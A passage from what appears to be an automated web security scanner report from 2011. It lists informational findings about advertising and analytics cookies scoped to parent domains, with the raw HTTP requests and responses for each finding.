Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; UID=4a757a7-24.143.206.42-1305663172; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method->-1,ts->1308922007; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 24 Jun 2011 13:30:59 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Sun, 23-Jun-2013 13:30:59 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.15. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=537085&ev=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; V=8vciuQJMXXJY; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 17:04:27 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; Domain=.contextweb.com; Expires=Sat, 23-Jun-2012 17:04:27 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 17:04:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
12.16. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=357&token=EHEX1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 13:31:14 GMT; Path=/
Set-Cookie: cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2; Domain=.contextweb.com; Expires=Sat, 28-May-2016 13:31:14 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
12.17. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; tpro_inst=269d9846e9d950257f8d2f16e66681e2; tpro=eJxVUdtuhSAQ%2FJd9JmYRL9Xf6ONJQwiikigY0CaN8d%2B7YM457dvsMjM7oydswY92MdCfMBk3mJDQqtIGi5bBaJ6DuBioKTOF5CWtGHBC7Y0%2BpKgyrWIgall1aajIoUa5LUdMI%2B%2FIIyidTbQ6NPScTMcg1ZpdVLTKZTTbuGXg9zmFQlLq2S5DMC6pnU%2BGHcl%2FTPbG5G2d9mt2RynwXlMclA0%2BszUoOd5TTbHxna4s0w2%2FLOZu6bzLxavmzxqLmm5OQQ0y6jlfEBfpot1TjseZEfTwufmwR6BOO7UU2HZN2ZXNxV6MUbloBzMUlPkfTzQ1v75e1el%2F7Da1er8yWP0gtT8ciUoG3yZE6%2BnDAC8QrusXAdOE%2Fw%3D%3D; ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:28 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n28 ( iad-agg-n33), ms iad-agg-n33 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Sat, 25 Jun 2011 17:04:28 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslJyNXYzNnJyMTB1tHBxcTNxMTUzMXMxtzQzMTCwsHBSqgUAqREIvw%3D%3D; expires=Sat, 23-Jun-2012 17:04:28 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;
12.18. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467?[AQB]&ndh=1&t=24/5/2011%208%3A48%3A13%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&pid=View%20Answer&pidt=1&oid=http%3A//support.ea.com/app/ask&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:14 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:48:14 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:48:14 GMT
Last-Modified: Sat, 25 Jun 2011 13:48:14 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04959E-3682-6FD6BEE2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www337
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.19. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727?[AQB]&ndh=1&t=24/5/2011%208%3A47%3A32%205%20300&ce=UTF-8&pageName=Support%20Home&g=http%3A//support.ea.com/&cc=USD&c1=Not%20Logged%20In&v8=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21&c10=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21&c15=EA%20Support&pid=Support%20Home&pidt=1&oid=javascript%3Avoid%28openPositionedWindow%28%27http%3A//www.info.ea.com%27%2C%2520%27info%27%2C%2520780%2C%2520800%2C%25200%2C%25200%2C%2520t&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:33 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:47:33 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:47:33 GMT
Last-Modified: Sat, 25 Jun 2011 13:47:33 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E049575-630B-08274CF4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www227
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.20. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536?[AQB]&ndh=1&t=24/5/2011%208%3A50%3A20%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&pe=lnk_e&pev1=http%3A//twitter.com/askeasupport&pid=View%20Answer&pidt=1&oid=http%3A//twitter.com/askeasupport&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:21 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:50:21 GMT; Domain=.2o7.net; Path=/
